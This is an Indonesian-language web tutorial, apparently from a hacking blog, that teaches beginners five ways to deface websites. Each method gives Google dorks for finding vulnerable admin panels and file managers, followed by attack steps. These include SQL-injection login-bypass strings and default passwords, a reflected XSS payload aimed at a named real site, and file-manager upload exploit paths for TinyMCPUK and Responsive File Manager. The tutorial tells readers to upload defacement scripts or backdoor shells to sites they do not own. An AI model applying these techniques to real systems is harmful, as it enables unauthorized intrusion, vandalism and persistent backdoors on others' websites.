DEFACE TUTOR

  DEFACE ROOM TUTOR

 

1.Cara Deface Website: Belajar Deface Dengan Teknik Bypass Admin Login 

Cara Deface Website: Cara Belajar Deface Dengan Teknik Bypass Admin Login - Belajar mendeface website memang banyak caranya dengan menggunakan berbagai macam teknik metode, kali ini khusus untuk pemula biar sama-sama kita belajar deface website jadi mari kita akan coba mengetahui cara deface website menggunakan metode Bypass Admin Login.

1. Pertama kita siapkan dork nya terlebih dahulu agar dapat memulai belajar cara deface website

Ketik dork di google seperti berikut ini:
inurl:/admin.php intext:login intext:adminsitrator
 inurl:/admin/index.php intext:username
inurl :/admin/Admin.php intext:login
inurl:/administrator/login.php intext:username site:.
inurl:/login.php intext:administrator intext:login
inurl:/panel intext:"Parent Directory"
intitle:"/image site:in

intitle:"administrator"
inurl:/login.php site:
inintext:"username" intitle:"login"inurl:/admin/logout.php
inurl:/admin/images
intext:"Parent Directory" site:
insite:uk intext:"admin/images" intitle:"index of"
intitle:"/admin-cp/"inurl:/login/images
intext:"Parent Directory" site:in
intext:/admin/login/upload"images
intext:"Parent Directory
intitle:adminstration area intext:login
intitle:adminstration area intext:Parent Directory/images"
intitle:"index of" admin
intext:"Parent Directory" :/admin/imagesiintitle:"index of
inurl:/panel intext:"login"inurl:/admin/images:intitle:"index of

2. Lalu gunakan salah satu dork diatas di google, kemudian pilih salah satu website target anda

3. Setelah masuk ke login admin di website tersebut, masukkan username dan password seperti dibawah ini.

 Cara Deface Website: Belajar Deface Dengan Teknik Bypass Admin Login
username: '=''or'
password: '=''or'

 Cara Deface Website: Belajar Deface Dengan Teknik Bypass Admin Login
username: admin
password: admin

 Cara Deface Website: Belajar Deface Dengan Teknik Bypass Admin Login
username: superadmin atau #superadmin
password: superadmin atau #superadmin

 Cara Deface Website: Belajar Deface Dengan Teknik Bypass Admin Login
username: admin
password: admin123

 4. Submit Login/Enter

 

 5. Jika berhasil login ke dalam admin panel, silahkan anda upload script deface ataupun upload shell backdoor yang anda miliki.

 

 6. Apabila anda tidak berhasil login ke dalam website tersebut, gunakan website lainnya atau bisa gunakan dork diatas yang lainnya..

Sekian artikel cara deface website dengan belajar mendeface website menggunakan teknik metode bypass admin login,

2.Cara Deface Website: Belajar Deface Dengan Metode XSS 

Cara Deface Website: Belajar Deface Dengan Menggunakan Teknik Metode XSS Untuk Pemula - Yoo sob mari kita mencoba mendeface website, memang banyak caranya dengan menggunakan berbagai macam teknik metode, kali ini khusus untuk pemula biar sama-sama kita belajar deface website jadi mari kita akan coba mengetahui cara deface website menggunakan metode XSS.

1. Pertama kita siapkan dork nya terlebih dahulu agar dapat memulai belajar cara deface website

Ketik dork di google seperti berikut ini:

inurl:/news.php?id=

inurl:/news.php?id= site.co.il (israel)

2. Kemudian pilih salah satu website target anda

3. Sebagai contoh saya mendapatkan target website untuk di deface, yaitu http://isr-tkd.com/index.php?cntr=e/news.php?id=1

4. Selanjutnya cek website apakan vuln atau tidak, cara nya tambahkan tanda koma atas ( ' ) di akhir id=1'

contoh: 

http://isr-tkd.com/index.php?cntr=e/news.php?id=1'

 website yang vuln akan menampilkan error, dengan tulisan seperti dibawah ini:

• Warning: mysql_result() expects parameter 1 to be resource, boolean given in /home/isrtkd/public_html/press.php on line 4
• You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''

5. Kemudian lakukan penambahan exploit untuk melanjutkan deface website menggunakan XSS
seperti contoh dibawah ini,

 http://isr-tkd.com/index.php?cntr=e/news.php?id=1%3Ch1%3ECuk%20Jancuk%20Pwned%20by%20https://www.wakilmu.com%3C/h1%3E

 

Yang nanti nya akan menampilkan tulisan kode deface "Cuk Jancuk Pwned by.

3.Cara Deface Website: Untuk Pemula Belajar Deface Dengan Teknik Tinymcpuk Mediatech

 Cara Deface Website: Untuk Pemula Belajar Deface Dengan Teknik Tinymcpuk Mediatech - Tutorial cara mendeface website memang banyak caranya dengan menggunakan berbagai macam teknik metode, kali ini khusus untuk pemula biar sama-sama kita belajar deface website jadi mari kita akan coba mengetahui cara deface website menggunakan metode Tinymcpuk Mediatech.

1. Pertama kita siapkan dork nya terlebih dahulu agar dapat memulai belajar cara deface website

 

Ketik dork di google seperti berikut ini:

All rights reserved. © 2015 Media Tech Indonesia

All rights reserved. © 2016 Media Tech Indonesia

All rights reserved. © 2017 Media Tech Indonesia

All rights reserved. © 2018 Media Tech Indonesia

2. Kemudian pilih salah satu website yang tampil, kemudian gunakan exploit dibawah ini

 /tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash

3. Upload file script deface anda (shell.php.fla) (shell.html.fla)
4. Setelah itu akses website tersebut dengan exploit

/tinymcpuk/gambar/Flash/shell.php.fla

 contoh:

 www.namadomain.com/tinymcpuk/gambar/Flash/shell.php.fla

 

4.Cara Deface Website: Belajar Deface Dengan Teknik Priv8 CSR 

 Cara Deface Website: Belajar Deface Dengan Menggunakan Teknik Metode Priv8 CSR Untuk Pemula - Mendeface website memang banyak caranya dengan menggunakan berbagai macam teknik metode, kali ini khusus untuk pemula biar sama-sama kita belajar deface website jadi mari kita akan coba mengetahui cara deface website menggunakan metode Priv8 CSR.

1. Pertama kita siapkan dork nya terlebih dahulu agar dapat memulai belajar cara deface website

Ketik dork di google seperti berikut ini:

 inurl:/config/config.izo

 2. Kemudian pilih salah satu website target anda, apabila website tersebut tampil seperti dibawah ini, maka bisa anda lakukan cara proses mendeface dengan teknik Priv8 CSR

3. Ketika sudah menemukan website yang vuln, lalu tulis apa yang akan ditampilkan nanti di website yang kalian deface, seperti contoh pada gambar.

4. Submit Hajar..!

5. Lalu cek di namadomain/config/tar.tmp

Apabila sudah menampilkan tulisan deface yang barusan anda masukkan berarti, anda sudah berhasil mendeface website tersebut.

5.Cara Belajar Deface Dengan Metode Responsive File Manager

Cara Belajar Deface Dengan Menggunakan Metode Responsive File Manager Untuk Pemula - Metode teknik deface yang saya jadikan bahan artikel kali ini sangat cocok bagi anda yang ingin belajar deface, karena tidak diperlukan tools tambahan dalam melakukan deface seperti teknik metode deface lainnya.

Bahan:

- Kumpulan Script Deface
- Dork Website Vuln

 Dork:

inurl:/filemanager/ intext:"dialog.php"
inurl:/js/filemanager/ intext:"dialog.php"
inurl:/assets/filemanager/ intext:"dialog.php"

Tutorial:
1. Buka Browser Andalanmu (Google, Mozilla, Opera Mini, DLL)
2. Copy Paste salah satu dork diatas
3. Cek setiap website yang tampil, seperti gambar dibawah ini

 

 4. Pilih klik dialog.php

 5. Upload File Script Deface

 

 6. Setelah berhasil Upload, Silahkan cek URL deface kalian

 

Nah dengan begitu kalian sudah berhasil belajar deface bagi kita yang pemula, dengan menemukan kerentanan pada sebuah website melalui uploader file manager website tersebut.

 

 Selamat mencoba dan kembangkan dork biar akan semakin banyak website yang berhasil anda deface.